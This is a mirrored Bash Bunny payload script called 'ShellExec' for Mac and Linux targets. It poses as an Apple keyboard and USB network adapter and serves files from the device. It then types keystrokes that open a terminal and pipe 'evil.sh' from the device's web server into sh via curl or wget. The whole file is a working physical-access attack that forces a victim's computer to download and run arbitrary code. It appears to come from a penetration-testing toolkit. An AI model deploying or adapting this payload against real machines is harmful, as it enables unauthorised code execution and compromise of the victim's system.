mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
65 lines
1.3 KiB
Bash
65 lines
1.3 KiB
Bash
#!/bin/bash
|
|
|
|
# Title: ShellExec
|
|
# Author: audibleblink
|
|
# Target: Mac/Linux
|
|
# Version: 1.0
|
|
#
|
|
# Create a web server on the BashBunny and forces
|
|
# the victim download and execute a script.
|
|
#
|
|
# White | Ready
|
|
# Ammber blinking | Waiting for server
|
|
# Blue blinking | Attacking
|
|
# Green | Finished
|
|
|
|
LED R G B
|
|
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
|
|
|
|
source bunny_helpers.sh
|
|
|
|
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
|
|
log_file=$payload_dir/shellexec.log
|
|
|
|
cd $payload_dir
|
|
|
|
# starting server
|
|
LED R G 500
|
|
|
|
cat <<EOF | python &>> $log_file &
|
|
import SimpleHTTPServer
|
|
import BaseHTTPServer
|
|
import SocketServer
|
|
|
|
#Disable logging DNS lookups
|
|
BaseHTTPServer.BaseHTTPRequestHandler.address_string = lambda self: str('$TARGET_IP')
|
|
|
|
settings = ('$HOST_IP',80)
|
|
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
|
|
httpd = SocketServer.TCPServer(settings, Handler)
|
|
httpd.serve_forever();
|
|
EOF
|
|
|
|
# wait until port is listening
|
|
while ! nc -z $HOST_IP 80; do sleep 0.2; done
|
|
|
|
# attack commences
|
|
LED B 500
|
|
|
|
Q GUI SPACE
|
|
Q DELAY 300
|
|
Q STRING terminal
|
|
Q DELAY 100
|
|
Q ENTER
|
|
Q DELAY 2000
|
|
|
|
# Q ALT F2 # swap with block above for linux
|
|
# Q DELAY 100
|
|
|
|
Q STRING curl "http://$HOST_IP/evil.sh" \| sh
|
|
# in case curl isn't installed
|
|
# Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh
|
|
Q ENTER
|
|
|
|
LED G
|